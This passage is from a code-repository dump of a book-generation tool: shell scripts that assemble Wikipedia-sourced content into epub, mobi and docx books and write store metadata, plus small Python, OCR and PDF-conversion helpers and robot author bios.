\"$TMPDIR\"$uuid/sorted_uniqs.txt > $TMPDIR$uuid/tmpuniqs.txt\ncp \"$TMPDIR\"$uuid/tmpuniqs.txt \"$TMPDIR\"$uuid/sorted_uniqs.txt\nsed -i G \"$TMPDIR\"$uuid/sorted_uniqs.txt\necho '\\pagenumbering{gobble}' > $TMPDIR$uuid/sorted_uniqs_sky.txt\necho \" \" >> $TMPDIR$uuid/sorted_uniqs_sky.txt\nsed -n 1,25p $TMPDIR$uuid/sorted_uniqs.txt >> $TMPDIR$uuid/sorted_uniqs_sky.txt\ncp \"$TMPDIR\"$uuid/sorted_uniqs.txt \"$TMPDIR\"$uuid/sorted_uniqs.md\ncp \"$TMPDIR\"$uuid/sorted_uniqs_sky.txt \"$TMPDIR\"$uuid/sorted_uniqs_sky.md\n\necho \"\" >> \"$TMPDIR\"$uuid/sorted_uniqs.md\necho \"\" >> \"$TMPDIR\"$uuid/sorted_uniqs.md\n\nif [ \"$sample_tweets\" = \"yes\" ] ; then\n\t\t\techo \"adding Tweets to back matter\"\n\t\t\tcat \"$TMPDIR\"$uuid/twitter/sample_tweets.md >> \"$TMPDIR\"$uuid/backmatter.md\nelse\n\t\t\techo \"no sample tweets\"\n\t\t\ttouch $TMPDIR$uuid/twitter/sample_tweets.md\nfi\n\n\tif [ \"$flickr\" = \"on\" ] ; then\n\n\t\tcd \"$TMPDIR\"$uuid/flickr\n\t\tfor file in *.md\n\t\tdo\n\t\t cat $file >> allflickr.md\n\t\t echo '\\newpage' >> allflickr.md\n\t\t echo \"\" >> allflickr.md\n\t\tdone\n\t\tcat allflickr.md >> \"$TMPDIR\"$uuid/backmatter.md\n\t\t#cp *.jpg ..\n\t\t# cp allflickr.md ..\n\t\t#cd ..\n\t\t# $PANDOC -o images.pdf allflickr.md\n\t\t# cd $scriptpath\n\t\t# echo \"converted flickr md files to pdf pages with images\" | tee --append $xform_log\n\n\telse\n\t\techo \"didn't process flickr files\"\n\t\ttouch $TMPDIR$uuid/allflickr.md\n\tfi\n\n# Build sources page\n\n\techo \"# Sources\" >> \"$TMPDIR$uuid/sources.md\"\n echo \" \" >> \"$TMPDIR$uuid/sources.md\"\n\twhile IFS= read -r line; do\n\n\tsafeline=$(echo $line | sed -e 's/[ ]/_/g')\n\techo \"Wikipedia contributors, $line, Wikipedia, The Free Encyclopedia, https://en.wikipedia.org/w/index.php?title=$safeline, accessed $(date +\"%m-%d-%Y\").\" >> \"$TMPDIR$uuid/wiki/wikisources.md\"\n echo \" \" >> \"$TMPDIR\"$uuid/wiki/wikisources.md\n\techo \" \" >> \"$TMPDIR\"$uuid/wiki/wikisources.md\n\tdone < \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\n# add search engine results to sources section\n\nwhile IFS= read -r line; do\n\tsafeline=$(echo $line | sed -e 's/[ ]/_/g')\n\techo \"$search_plugin_name\", $line, Wikipedia, The Free Encyclopedia, https://en.wikipedia.org/w/index.php?title=$safeline, accessed $(date +\"%m-%d-%Y\"). >> \"$TMPDIR$uuid/wiki/wikisources.md\"\n\techo \" \" >> \"$TMPDIR\"$uuid/wiki/wikisources.md\n\techo \" \" >> \"$TMPDIR\"$uuid/wiki/wikisources.md\ndone < \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\n# pipe other sources in here, either apppend with ## second-level heading or sort -u\n\n cat \"$TMPDIR\"$uuid/content_collections/content_sources.md >> \"$TMPDIR\"$uuid/sources.md\n cat \"$TMPDIR\"$uuid/wiki/wikisources.md >> \"$TMPDIR\"$uuid/sources.md\n\n \tcat includes/wikilicense.md >> \"$TMPDIR/$uuid/sources.md\"\n\techo \"\" >> \"$TMPDIR$uuid/sources.md\"\n\techo \"\" >> \"$TMPDIR$uuid/sources.md\"\n\n\techo \"# Also built by \"$imprintname\" Robot $jobprofilename\" >> \"$TMPDIR\"$uuid/builtby.md\n\tsort -u --ignore-case \"$LOCAL_DATA\"bibliography/robots/\"$jobprofilename\"/$jobprofilename\"_titles.txt\" -o \"$LOCAL_DATA\"/bibliography/robots/\"$jobprofilename\"/$jobprofilename\"_titles.tmp\" # currently sort by alphabetical\n\tcat \"$LOCAL_DATA\"/bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"\"_titles.tmp\" >> \"$TMPDIR\"$uuid/builtby.md\n\techo \" \">> \"$TMPDIR\"$uuid/builtby.md\n\techo \" \" >> \"$TMPDIR\"$uuid/builtby.md\n\necho \"starting imprint biblio\"\n\n\tif [ \"add_imprint_biblio\" = \"yes\" ] ; then\n\t\t\techo \"# Also from $imprintname\" >> \"$TMPDIR\"$uuid/byimprint.md\n\t\t\tuniq \"$LOCAL_DATA\"bibliography/imprints/\"$imprint\"/$imprint\"_titles.txt\" >> \"$TMPDIR\"$uuid/byimprint.md # imprint pubs are not alpha\n\t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/byimprint.md\"\n\t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/byimprint.md\"\n\telse\n\t\t \ttrue\n\t\t\ttouch $TMPDIR$uuid/byimprint.md\n\t\t\t# commenting out imprint bibliography because data is too messy right now\n fi\n\n# builds analyzed webpage info for back matter\"\n\necho \"$analyze_url is analyze_url\"\ntouch \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n\n# if [ -z ${analyze_url+x} ] ; then\n#\n# \t\t\t echo \"no web page was analyzed\"\n# else\n# \t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n# \t\t\techo \"\" >> \"$TMPDIR\"$uuid/\"analyzed_webpage.md\"\n# \t\t\t\"$PANDOC_BIN\" -s -r html \"$analyze_url\" -o \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n# \t\t\t#\"$PYTHON_BIN\" bin/nerv3.py \"$TMPDIR\"$uuid\"/analyzed_webpage.md\" \"$TMPDIR\"$uuid\"/analyzed_webseeds\" \"$uuid\"\n# \t\t\tcd \"$NER_BIN\" && java -mx600m -cp \"*:lib/*\" edu.stanford.nlp.ie.crf.CRFClassifier -loadClassifier classifiers/english.all.3class.distsim.crf.ser.gz -textFile \"$TMPDIR\"$uuid\"/webpage.md\" -outputFormat tabbedEntities > \"$TMPDIR\"$uuid\"/webseeds\"\n# \t\t\tcd \"\"$scriptpath\"\n# \t\t\techo \"# Webpage Analysis\" >> \"$TMPDIR\"$uuid/analyzed_webpage.md\n# \t\t\techo \"I analyzed this webpage $analyze_url. I found the following keywords on the page.\" >> \"$TMPDIR\"$uuid/analyzed_webpage.md\"\n# \t\t\tcomm -2 -3 <(sort \"$TMPDIR\"$uuid\"/analyzed_webseeds\") <(sort $scriptpath\"locale/stopwords/webstopwords.\"$wikilang) >> \"$TMPDIR\"$uuid\"/analyzed_webpage.md\n# \t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n# \t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n# fi\n\ntouch \"$TMPDIR\"$uuid/imprint_mission_statement.md\necho \"imprint is $imprint\"\ncat $confdir\"jobprofiles/imprints/$imprint/\"\"$imprint_mission_statement\" >> \"$TMPDIR\"$uuid\"/imprint_mission_statement.md\"\necho '!['\"$imprintname\"']'\"(\"\"$imprintlogo\"\")\" >> \"$TMPDIR\"$uuid/imprint_mission_statement.md\necho \"built back matter\"\n\nmy_year=`date +'%Y'`\n\necho \"\" > \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"---\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"title: \\\"$booktitle\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"subtitle: \\\"$subtitle\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"creator: \" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"- role: author \" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \" text: \"\" \\\"$editedby\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"publisher: \\\"$imprintname\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"rights: (c) \\\"$my_year $imprintname\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"---\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\n\nsafe_product_name=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9._-]/_/g')\nbibliography_title=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9 :;,.?]//g')\n\n#always builds all partsofthebook\necho \"starting parts of the book assembler\"\n. includes/partsofthebook.sh\n\n# always builds cover\necho \"starting cover builder\"\n. includes/builder-cover.sh\n\n# sometimes build additional booktypes\n\ncase $booktype in\nreader)\n\t# default\n echo \"assembled all parts of the book by default\"\n ;;\ndraft-report)\n\techo \"assembling parts needed for $booktype\"\n . includes/draft-report.sh\n\t\"$PANDOC_BIN\" -o \"$TMPDIR$uuid/draft-report-$safe_product_name.docx\" \"$TMPDIR\"$uuid/draft-report.md\n\t\"$PANDOC_BIN\" -t mediawiki -o \"$TMPDIR$uuid/draft-report-$safe_product_name.mw\" \"$TMPDIR\"$uuid/draft-report.md\n\tcp \"$TMPDIR$uuid/draft-report.md\" \"$TMPDIR$uuid/complete.md\"\n\t# note that draft-report does not get SKU because it is not a completed product\n ;;\ncontent-collections-first)\n\t\techo \"assembling parts needed for $booktype\"\n\t . includes/content-collections-first.sh\n\t\t\"$PANDOC_BIN\" -o \"$TMPDIR$uuid/ccf-$safe_product_name.docx\" \"$TMPDIR\"$uuid/content-collections-first.md\n\t\t# note that content-collections-first does not get SKU because it is not a completed product\n\t ;;\ndaily-email)\n\t\t\t\techo \"assembling parts needed for $booktype\"\n\t\t\t . includes/daily-email.sh\n\t\t\t ;;\n*)\n echo \"assembled all parts of the book by default\"\n ;;\nesac\n\n# build ebook in epub\n\ncd \"$TMPDIR\"$uuid\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".epub\" --epub-cover-image=\"$TMPDIR\"$uuid/cover/$sku\"ebookcover.jpg\" \"$TMPDIR\"$uuid/complete.md\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".docx\" \"$TMPDIR\"$uuid/complete.md\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".txt\" \"$TMPDIR\"$uuid/complete.md\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".mw\" -t mediawiki -s \"$TMPDIR\"$uuid/complete.md\ncp \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".txt\" \"$TMPDIR\"$uuid/4stdout\".txt\"\n\n\n\ncd $scriptpath\n\nif [ \"$kindlegen_on\" = \"yes\" ] ; then\n\n\tlib/KindleGen/kindlegen \"$TMPDIR\"$uuid/$sku.\"$safe_product_name\"\".epub\" -o \"$sku.$safe_product_name\"\".mobi\"\nelse\n\tebook-convert \"$TMPDIR\"$uuid/$sku.\"$safe_product_name\"\".epub\" \"$TMPDIR\"$uuid\"/$sku.$safe_product_name\"\".mobi\"\nfi\n\necho \"built epub, mobi, and txt\"\ncase $ebook_format in\n\nepub)\nif [ ! \"$buildtarget\" ] ; then\n\tbuildtarget=\" \"$TMPDIR\"$uuid/buildtarget.epub\"\nelse\n\techo \"received buildtarget as $buildtarget\"\nfi\n# deliver epub to build target\ncp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".epub\" \"$buildtarget\"\n\nchmod 755 \"$buildtarget\"\n#echo \"checking that buildtarget exists\"\n#ls -la $buildtarget\n;;\n\nmobi)\nif [ ! \"$buildtarget\" ] ; then\n\tbuildtarget=\"$TMPDIR\"$uuid\"/buildtarget.mobi\"\nelse\n\techo \"received buildtarget as $buildtarget\"\nfi\ncp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".mobi\" \"$buildtarget\"\n#echo \"checking that buildtarget exists\"\n#ls -la $buildtarget\n;;\ndocx)\nif [ ! \"$buildtarget\" ] ; then\n\tbuildtarget=\"$TMPDIR\"$uuid\"/buildtarget.docx\"\nelse\n\techo \"received buildtarget as $buildtarget\"\nfi\ncp \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".docx\" \"$buildtarget\"\nchmod 755 \"$buildtarget\"\necho \"checking that buildtarget exists\"\n#ls -la $buildtarget\n;;\n*)\n\nesac\n\n\n# build skyscraper image\n\nif [ -z \"$skyscraper\" ]; then\n\techo \"no skyscraper\"\nelse\n\n\t. includes/1000x3000skyscraper.sh\n\techo \"built skyscraper\"\nfi\n\n# housekeeping\n\nunique_seed_string=$(sed -e 's/[^A-Za-z0-9._-]//g' < \"$TMPDIR\"$uuid/seeds/sorted.seedfile | tr -d '\\n')\n\n#checking if seedstring already in imprint corpus\n\nif [ \"$add_corpora\" = \"yes\" ] ; then\n\n\tif grep -q \"$unique_seed_string\" \"$SFB_HOME\"shared-corpus/imprints/\"$imprint\"/unique_seed_strings.sorted ; then\n\t\techo \"seed string $unique_seed_string is already in corpus for imprint $imprint\"\n\telse\n\t\tcp -u \"$TMPDIR\"$uuid\"/\"$sku.$safe_product_name\".epub\" \"$SFB_HOME\"shared-corpus/imprints\"/\"$imprint\"/\"$sku.$safe_product_name\".epub\"\n\t\techo \"added book associated with $unique_seed_string to corpus for imprint $imprint\"\n\tfi\nelse\n\t:\nfi\n\n# checking if seed string is already in robot corpus\nif [ \"$add_corpora\" = \"yes\" ] ; then\n\n\tif grep -q \"$unique_seed_string\" \"$SFB_HOME\"shared-corpus/robots/$jobprofilename/unique_seed_strings.sorted ; then\n\t\techo \"seed string $unique_seed_string is already in corpus for robot $jobprofilename \"\n\telse\n\t\tcp \"$TMPDIR\"$uuid\"/\"$sku.$safe_product_name\".epub\" \"$SFB_HOME\"shared-corpus/robots/\"$jobprofilename\"/\"$sku.$safe_product_name.epub\"\n\t\techo \"added book associated with $unique_seed_string to corpus for robot $jobprofilename\"\n\tfi\nelse\n\ttrue\nfi\n\nif [ \"$add_corpora\" = \"yes\" ] ; then\n\techo \"$unique_seed_string\" >> \"$SFB_HOME\"shared-corpus/imprints/\"$imprint\"/unique_seed_strings\n\techo \"$unique_seed_string\" >> \"$SFB_HOME\"shared-corpus/robots/\"$jobprofilename\"/unique_seed_strings\n\tsort -u $SFB_HOME\"shared-corpus/robots/\"$jobprofilename\"/unique_seed_strings\" > $SFB_HOME\"shared-corpus/robots/\"$jobprofilename\"/unique_seed_strings.sorted\"\n\tsort -u $SFB_HOME\"shared-corpus/imprints/\"$imprint\"/unique_seed_strings\" > $SFB_HOME\"shared-corpus/imprints/\"$imprint\"/unique_seed_strings.sorted\"\n\nelse\n\techo \"not requested to add builds and unique_seed_strings to corpus\"\nfi\n\n\nif [ -z \"$batch_uuid\" ] ; then\n\techo \"not part of a batch\"\nelse\n\tcp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".epub\" \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\".epub\"\n cp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".mobi\" \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\".mobi\"\n cp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".docx\" \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\".docx\"\n cp \"$TMPDIR\"$uuid/summary.txt \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_summary\"\n cp \"$TMPDIR\"$uuid/all_nouns.txt \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_all_nouns\"\n cp \"$TMPDIR\"$uuid/acronyms.txt \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_acronyms\"\n cp \"$TMPDIR\"$uuid/cover/wordcloudcover.png \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_wordcloudcover.png\"\n cp \"$TMPDIR\"$uuid/seeds/filtered.pagehits \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_filtered.pagehits\"\n #ls -l \"$TMPDIR\"\"$batch_uuid\"/* # debug\nfi\necho \"seedfile is $seedfile\"\n\nif [ \"$dontcleanupseeds\" = \"yes\" ]; then\n\techo \"leaving seed file in place $seedfile\"\n\t# default is \"yes\" in includes/set-variables\nelse\n echo \"cleaning up seed file [deprecated, for use with Magento script tool]\"\n\trm \"$seedfile\"\nfi\n\n# increment sku\n\nsku=$((sku+1))\necho $sku >> \"$LOCAL_DATA\"\"SKUs/sku_list\"\necho \"incremented SKU by 1 to\" $sku \" and updated SKUs/sku_list\"\n\necho \"moving tmp biography to replace prior one\"\ncp \"$LOCAL_DATA\"bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"\"_titles.tmp\" \"$LOCAL_DATA\"/bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"\"_titles.txt\"\necho \"appending & sorting new bibliography entries\" # last item is out of alpha order, so must be sorted when read in future\necho \"adding markdown-safe bibliography title as $bibliography_title\"\necho \"* $bibliography_title\" >> \"$LOCAL_DATA\"bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"_titles.txt\necho \"* $bibliography_title\" >> \"$LOCAL_DATA\"bibliography/imprints/\"$imprint\"/\"$imprint\"_titles.txt\ncat \"$TMPDIR\"$uuid\"/yaml-metadata.md\" >> \"$LOCAL_DATA\"bibliography/yaml/allbuilds.yaml\n\n# add some simple tests that builds worked ok\n\n# always reports success, whether verbose is on or off\n\nexec 1>&3\necho \"builder run complete, files in $TMPDIR$uuid/\"\n\nexit 0\n" }, { "alpha_fraction": 0.7472527623176575, "alphanum_fraction": 0.7802197933197021, "avg_line_length": 89, "blob_id": "ee3c660efd8af875b4ef044ecd608ded20b46a18", "content_id": "4620be51e6fbef8dba8b5f095f8c597134e5b86f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "permissive", "max_line_length": 89, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Gigo.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Gigo was created to test the create a robot feature for SI 622. Hopefully this will work. \n" }, { "alpha_fraction": 0.6836591958999634, "alphanum_fraction": 0.6913408041000366, "avg_line_length": 27.078432083129883, "blob_id": "93cc7432b8dba7383c70900013dd032df58fdd72", "content_id": "c02a306b432d90fe2c42b92420316edd2b4acf00", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1432, "license_type": "permissive", "max_line_length": 113, "num_lines": 51, "path": "/scripts/bin/mwseeds.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- codinwig: utf-8 -*-\n\"\"\"\nFred Zimmerman\[email protected]\n(c) PageKicker 2014\n\n\"\"\"\n\nimport argparse\nimport codecs\nimport sys\nimport time\nimport wikipedia\nimport mwclient\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--pagehits\", help = \"path to list of page hits\", default = 'pagehits')\nparser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'http://en.wikipedia.org/w/api.php')\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\npagehits = args.pagehits\nlang = args.lang\nsummary = args.summary\nrequest_type = args.request_type\nmediawiki_api_url = args.mediawiki_api_url\nwikipedia.set_lang(lang)\n\ntest = 'mw url is ' + mediawiki_api_url\nprint(test)\n\nfile1 = open(input_file, 'r')\nfile3 = codecs.open(pagehits,'w','utf-8')\nfor line in file1:\n print(line)\n try:\n seedhits = wikipedia.search(line)\n\n except:\n wikipedia.exceptions.DisambiguationError\n wikipedia.exceptions.WikipediaException\n continue\n\n for i in seedhits:\n file3.write(i+'\\n')\n file3.close\n" }, { "alpha_fraction": 0.7330677509307861, "alphanum_fraction": 0.737051784992218, "avg_line_length": 14.6875, "blob_id": "8af5de99552fb16937bad4e72612cfc4d5e10f36", "content_id": "7fdc83bae7b9d4a58fc7918cfd86068129b235eb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 251, "license_type": "permissive", "max_line_length": 52, "num_lines": 16, "path": "/scripts/pdfdir2txt.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# convert all pdfs in current directory to txt\n\n# needs to be portabilized\n# needs native recursion\n\n\nfor file in *.pdf\ndo\n\tpdftotext $file\n\techo \"converted \"$file \"to txt\"\ndone\necho \"done converting PDFs in this directory to txt\"\nexit\n0\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7282230257987976, "avg_line_length": 40, "blob_id": "58e65942a2da67e4c9ccc046ca5b298819a7ef00", "content_id": "9b429c19442d677a3df05c6b22f47f8221fff54d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 574, "license_type": "permissive", "max_line_length": 80, "num_lines": 14, "path": "/scripts/bin/tesseract-test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/sh\nSTARTPAGE=1 # set to pagenumber of the first page of PDF you wish to convert\nENDPAGE=121 # set to pagenumber of the last page of PDF you wish to convert\nSOURCE=book.pdf # set to the file name of the PDF\nOUTPUT=book.txt # set to the final output file\nRESOLUTION=600 # set to the resolution the scanner used (the higher, the better)\n\ntouch $OUTPUT\nfor i in `seq $STARTPAGE $ENDPAGE`; do\n convert -monochrome -density $RESOLUTION $SOURCE\\[$(($i - 1 ))\\] page.tif\n echo processing page $i\n tesseract page.tif tempoutput\n cat tempoutput.txt >> $OUTPUT\ndone\n" }, { "alpha_fraction": 0.8085106611251831, "alphanum_fraction": 0.811170220375061, "avg_line_length": 375, "blob_id": "0b2c813957e1d88df3ae992a270ced57c457a6b6", "content_id": "8c5125492ae5392667ec804491f6e534711581d1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 376, "license_type": "permissive", "max_line_length": 375, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/NanoBot.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "NanoBot is a big fan of all things Nano. He likes to follow 2D materials and graphene, Laser plasmonics and Qubit research, and novel metallic alloys and organic polymers. Anything to do with Consumer Electronics at the nano level will be part of his daily research. NanoBot looks forward to the latest conference reports and hopes to see everyone at next years CES in Vegas.\n" }, { "alpha_fraction": 0.592079222202301, "alphanum_fraction": 0.592079222202301, "avg_line_length": 49.5, "blob_id": "6a8546b6d25d8660a63b790408e39dd41e5ccb7e", "content_id": "789cd638ba7e773f406b94b93a41089802194f84", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 505, "license_type": "permissive", "max_line_length": 169, "num_lines": 10, "path": "/scripts/includes/SEO-module.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# SEO module\n\nseoseed=$(echo \"$seed\" | sed -e 's/\"/_/g' -e 's/#/ /g' -e 's/\\&/ /g' -e 's/'\\''/_/g' -e 's/, /_/g' -e 's/,/_/g' -e 's/\\//_/g' -e 's/ /_/g' -e 's/\\\\/ /g' -e 's/|/_/g')\necho \"seoseed is\" $seoseed\n\ncat assets/pk-html-adsense.js > tmp/$uuid/seo-cumulative.html\ncat tmp/$uuid/cumulative.html >> tmp/$uuid/seo-cumulative.html\ncp tmp/$uuid/seo-cumulative.html $APACHE_ROOT\"pk-html/\"$seoseed\".html\"\n\necho \"ran SEO module and exported seo-cumulative.html to \"$APACHE_ROOT\"pk-html/\"$seoseed\".html\"\n" }, { "alpha_fraction": 0.7012360692024231, "alphanum_fraction": 0.7073661088943481, "avg_line_length": 25.7446231842041, "blob_id": "9ca1d0f3bb1b83b49f5d50dd256524362cf452d5", "content_id": "41e95ec6fbc83916a3dc43eb6c6fb0924bb56ee7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 9951, "license_type": "permissive", "max_line_length": 310, "num_lines": 372, "path": "/scripts/includes/metadata-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "sku=`tail -1 < $LOCAL_DATA\"SKUs/sku_list\"`\necho \"sku\" $sku\n\necho \"starting to write metadata to \" $metadatatargetpath | tee --append $sfb_log\n\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime >> $sfb_log\n\nspecial_from=$createtime\n\n(( special_from = createtime - 86400 ))\n\nnews_from_date=$createtime\n\n(( news_from_date = createtime - 86400 ))\n\nnews_from_date=`date -d @$news_from_date +'%m/%d/%y%n %H:%M:%S'`\n\n(( news_to_date = createtime + 7862400 ))\n\nnews_to_date=`date -d @$news_to_date +'%m/%d/%y%n %H:%M:%S'`\n\n# Adjust the timestamp above by number of minutes given\n\nminutes=$special_lasts_minutes\n\nspecial_lasts_sec=$(( $minutes * 60))\n\necho \"special lasts for this number of seconds\" $special_lasts_sec >> $sfb_log\n\n(( special_to = createtime + special_lasts_sec ))\n\necho \"special expires at \" $special_to >> $sfb_log\n\necho \"special expires at\" `date -d @$special_to +'%m/%d/%y%n %H:%M:%S'` >> $sfb_log\n\necho \"book is new from at \" $news_from_date >> $sfb_log\n\necho \"book is no longer new at \" $news_to_date >> $sfb_log\n\nspecial_from_date=`date -d @$special_from +'%m/%d/%y%n %H:%M:%S'`\n\nspecial_to_date=`date -d @$special_to +'%m/%d/%y%n %H:%M:%S'`\n\nspecial_price=0.00\n\n#list of all metadata fields begins here\n\n#store\n\necho -n \"admin,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# websites\n\necho -n \"base,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# attribute set\n\necho -n \"Default,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# type\n\necho -n \"downloadable,\">> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#sku\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# 2 is Nimble Combinatorial Publishing category\n\necho -n $categoryid\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# has options\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#name based on seed terms\n\nproductname=$covertitle\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $productname >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# url key n/a\n\n echo -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gift message available\n\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta title\n\necho -n $covertitle \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta description\n\necho -n \"foo,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n \n#image filename\n\necho -n $slash$uuid/$sku\"cover.png,\" >> $metadatatargetpath\"$uuid/current-import.csv\"\n\n# small image filename\n\necho -n $slash$uuid/$sku\"cover.png,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#thumbnail filename\n\necho -n $slash$uuid/$sku$\"cover.png,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# options container\n\necho -n \"Product Info Column,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#samples title \n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# links title \n\necho -n $escapeseed \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#url path below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# image label below\n\necho -n $escapeseed \" cover,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $escapeseed \" small cover,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $escapeseed \"cover thumbnail,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n#custom design below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"no layout updates,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n. includes/pricing.sh\n\necho -n \"$price\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n# description\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\ncat tmp/$uuid/longdescription.html | sed -e 's/\"/_/'g >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\",'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#short description below\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\ncat tmp/$uuid/shortdescription.html | sed -e 's/\"/_/'g | sed -e '/\\<html/d' | sed -e '/\\<body/d' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\",'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#meta keywords below\n\necho -n '\"'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# . includes/keyword-reader\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n ',' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#custom layout update below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# status below\n\necho -n 